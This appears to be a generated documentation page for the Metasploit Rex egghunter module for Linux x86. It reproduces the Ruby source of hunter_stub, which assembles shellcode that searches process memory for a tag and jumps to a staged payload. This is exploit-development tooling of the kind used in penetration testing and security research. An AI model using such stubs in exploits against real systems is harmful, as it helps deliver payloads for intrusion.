module Rex::Exploitation::Egghunter::Linux::X86
Constants
- Alias
Public Instance Methods
hunter_stub(payload, badchars = '', opts = {})
click to toggle source
The egg hunter stub for linux/x86.
# File lib/rex/exploitation/egghunter.rb, line 259 def hunter_stub(payload, badchars = '', opts = {}) startreg = opts[:startreg] raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4 marker = "0x%x" % opts[:eggtag].unpack('V').first checksum = checksum_stub(payload, badchars, opts) startstub = '' if startreg if startreg.downcase != 'ecx' startstub = "\n\tmov ecx,#{startreg}\n\tjmp next_addr" else startstub = "\n\tjmp next_addr" end end startstub << "\n\t" if startstub.length > 0 assembly = <<EOS cld #{startstub} check_readable: or cx,0xfff next_addr: inc ecx push 0x43 ; use 'sigaction' syscall pop eax int 0x80 cmp al,0xf2 je check_readable check_for_tag: ; check that the tag matches once mov eax,#{marker} mov edi,ecx scasd jne next_addr ; it must match a second time too scasd jne next_addr ; check the checksum if the feature is enabled #{checksum} ; jump to the payload jmp edi EOS assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string # return the stub assembled_code end